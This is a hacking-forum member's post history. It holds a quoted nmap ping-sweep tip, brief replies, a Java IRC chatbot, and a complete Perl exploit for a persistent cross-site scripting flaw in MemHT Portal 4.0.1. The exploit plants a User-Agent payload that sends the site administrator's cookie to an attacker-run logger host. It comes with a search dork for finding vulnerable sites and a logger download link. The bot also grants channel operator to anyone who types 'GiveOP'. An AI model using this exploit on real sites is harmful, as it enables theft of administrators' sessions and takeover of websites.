Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - ZonTa

Pages: [1]
1
Tutorials / Re: [Tutorial] Portscanning Fun
« on: December 24, 2011, 03:25:00 pm »
Quote from: Kulverstukas on December 24, 2011, 02:27:42 pm
You can write all the IP's to the list and then do

Code: [Select]
kulverstukas@kulverstukas-desktop:~$ nmap -sP -iL ~/ips.list

Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-24 15:26 EET
Host bru01m01-in-f105.1e100.net (209.85.147.105) is up (0.067s latency).
Host ir1.fp.vip.mud.yahoo.com (209.191.122.70) is up (0.17s latency).
Host xvm-100-57.ghst.net (173.246.100.57) is up (0.14s latency).
Nmap done: 3 IP addresses (3 hosts up) scanned in 2.80 seconds
-sP states that it should do nothing else but ping the host.
-iL states that it will scan all IP's in the given list, ips.list file in my case.

Most new routers and cameras doesn't respond to icmp.

2
Tutorials / Re: HTTP Splitting
« on: April 14, 2011, 03:45:40 am »
So when we do the Cache Poisoning , it works for all clients ??

3
Tutorials / Re: Linux (Web)server security
« on: April 14, 2011, 03:30:40 am »
It wasn't finished when u posted in opensc a long time ago :\

4
Hacking and Security / MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
« on: November 27, 2010, 04:57:09 pm »
I wrote this. I reported vendor and he gave me a positive reply. hehe  :)

http://www.exploit-db.com/exploits/15623/

Code: [Select]
#!/usr/bin/perl
# MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent]
# by ZonTa - zontahackers[at]gmail[dot]com
#
# After successful inject wait for the admin to view statistic page.
# Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html
# Dork : intext:"MemHT Portal is a free software released under the GNU/GPL License by Miltenovik Manojlo"

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;

my ($host,$id,$username,$password,$logger) = @ARGV;
 
my $http = new LWP::UserAgent;
my $u_agent = "]\"</td></tr><BODY ONLOAD=document.location=\"http://$logger?cookie=\"+document.cookie+\"&redirect=http://$host\">";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);

Main::Exploit();

package Main;

sub Exploit
{   
    if (@ARGV != 5) {
        Main::Usage();
    }
    else {
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
    }   
}   

sub Usage {
 
return print <<EOF;
+-------------------------------------------------------------------+
| MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability  |
+-------------------------[user agent]------------------------------+

by ZonTa - zontahackers[at]gmail[dot]com
 
Usage: perl exploit.pl host/path userId user pass logger[OPTIONS]

host: target host and memht path
userId: user id
user: valid username
pass: valid password
logger: PHP loging file
 
Example:
perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php

Download Logger.php -> http://pastebin.com/K6E9AWrC

EOF
}

package MemHT;
       
sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
     
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
exit;
}
else {
print "Logged In!\n";
print "XSS injected !";
       
    }
}

package HTTP;

sub UserAgent
{
    return $http->agent($_[0]);
}

sub Cookies
{
    return $http->default_header('Cookie' => $_[0]);
}
 
sub GET
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }   
    else {
        return $http->get($_[0]);
    }   
}
     
sub POST
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }   
    else {
        return $http->post($_[0]);
    }   
}
     
sub http_header
{
    return $http->default_header($_[0]);


# Greetz to Sri Lankans 

5
Hardware / Re: Make your old flash drive bootable!
« on: November 27, 2010, 05:23:20 am »
Do you have a solution for a computer that doesn't have USB boot ? That computer have 2 USB ports but it doesn't have USB boot option.

6
Scripting Languages / Java IRC Bot
« on: November 25, 2010, 06:51:24 pm »
I was going to make an AI bot , and ended up with this. lol :P

Code: [Select]
/**
 *
 * @author ZonTa
 */
import java.io.*;
import java.util.*;
import java.net.Socket;


public class JBot implements Runnable {

   Random generator = new Random();
   int r = generator.nextInt(100);

   private String server;
   private int port;
   private String channel;
   private String nick, user, name, owner;

   protected void server(String server) {
      this.server = server;
   }

   protected String server() {
      return this.server;
   }

   
   protected void port(int port) {
      this.port = port;
   }

   protected void channel(String channel) {
      this.channel = channel;
   }

   protected String channel() {
      return this.channel;
   }

   protected int port() {
      return this.port;
   }

   protected void nick(String nick) {
      this.nick = nick;
   }

   protected String nick() {
      return this.nick;
   }

   protected void user(String user) {
      this.user = user;
   }

   protected String user() {
      return this.user;
   }

   protected void name(String name) {
      this.name = name;
   }

   protected String name() {
      return this.name;
   }

   protected void owner(String owner) {
      this.owner = owner;
   }

   protected String owner() {
      return this.owner;
   }

   private boolean isActive;

   protected void isActive(boolean bool) {
      this.isActive = bool;
   }

   protected boolean isActive() {
      return this.isActive;
   }

   public static void main(String args[]) {
      System.out.println("Starting program.");
      try {
         new JBot().start();
      } catch (java.io.IOException e) {
      }
   }

      /**
* Credits to whoever wrote it.
* The AI KnowledgeBase for the bot */
      static String[][] KnowledgeBase = {
        {"HELLO",
"Hello!."
},

        {"WHAT IS YOUR NAME",
"MY\tNAME\tIS\tJ-BOT."
},

{"HI",
"HI\tTHERE!",
},

{"HOW ARE YOU",
"I'M\tDOING\tFINE!"
},

{"WHO ARE YOU",
"I'M\tAN\tA.I\tPROGRAM."
},

{"ARE YOU INTELLIGENT",
"YES,OFCORSE."
},

{"ARE YOU REAL",
"DOES\tTHAT\tQUESTION\tREALLY\tMATERS\tTO\tYOU?"
}
    };

    static String findMatch(String str) {
String result = "";
for(int i = 0; i < KnowledgeBase.length; ++i) {
if(KnowledgeBase[i][0].equalsIgnoreCase(str)) {
result = KnowledgeBase[i][1];
break;
}
}
return result;
    }

   protected void sayIt(String str) throws IOException {
       out.write(str);
       out.flush();
   }

   static String getMsg(String str) {
       String[] items = str.split(":");
       // System.out.println(items.length);
       if(items.length > 2)
           return items[2];
       else
           return "";
   }

    protected String getUser(String user) {
       String[] items = user.split("!");
       return items[0].replace(":", "");
    }

   protected JBot() {
      System.out.println("Initializing.");
      this.server("irc.evilzone.org");
      this.port(6667);
      this.nick("jBOT-" + r);
      this.user("jBOT");
      this.name("jBOT");
      this.channel("#evilzone");
      this.owner("Owner");
   }

   private Socket socket;
   private BufferedReader in;
   private BufferedWriter out;

   protected void start() throws java.io.IOException {
      this.socket = new Socket(this.server(), this.port());
      this.in = new BufferedReader(new InputStreamReader(socket.getInputStream()));
      this.out = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
      if (socket.isConnected()) {
         out.write("NICK " + this.nick() + "\r\n");
         out.write("USER " + this.user() + " \"\" \"\" :" + this.name() + "\r\n");

         this.isActive(true);
         System.out.println("Starting thread.");
         new Thread(this).start();
out.write("JOIN " + this.channel() +  " 456\r\n");
out.flush();
      }
   }

    public void run() {
      String buffer;
        try {
            out.write("PRIVMSG " + this.channel() + " Greetingz!\r\n");
            out.flush();
        } catch (IOException ex) {

        }

      while (this.isActive()) {
         try {
            while ((buffer = in.readLine()) != null) {
                System.out.println(buffer);
                String sResponse = findMatch(getMsg(buffer));
                if(sResponse.length() != 0) {
                    sayIt("PRIVMSG " + this.channel() + " " + sResponse +"\r\n");
                }
               
               if (buffer.startsWith("PING")) {
                  sayIt("PONG " + buffer.substring(5) + "\r\n");
                }
               if (buffer.contains("GiveOP")) {
                   String usr[] = buffer.split(" ");
                   if(usr.length >=4 ) {
                      try {
                          sayIt("MODE " + this.channel() + " +o "+ usr[4] + "\r\n");
                      } catch (Exception e) {
                          System.out.println(e.getMessage());
                      }
                  }else {
                       sayIt("MODE " + this.channel() + " +o "+ this.owner() + "\r\n");
                  }
                 
                }

               if (buffer.contains("kiss") ) {
                  sayIt("PRIVMSG " + this.channel() + " :* :* :* \r\n");
               }

                if (buffer.contains("thank") || buffer.contains("Thank") ) {
                  sayIt("PRIVMSG " + this.channel() + " You\tare\twelcome\t" + getUser(buffer) + "!\r\n");
               }

                 if (buffer.contains("KICK " + this.channel() + " " + this.nick())) {
                  sayIt("JOIN " + this.channel() +  " 456 \r\n");
                  sayIt("PRIVMSG " + this.channel() + " \u0002You\tcan't\tkick\tme! \r\n");
               }

               if (buffer.contains("JOIN :" + this.channel()) && !buffer.contains(this.nick)) {
                  sayIt("PRIVMSG " + this.channel() + " Welcome\t" + getUser(buffer) + " \r\n");
               }
 
            }
 
} catch (java.io.IOException e) {
             System.out.println(e.getStackTrace());
        }
      }
   }
}

Pages: [1]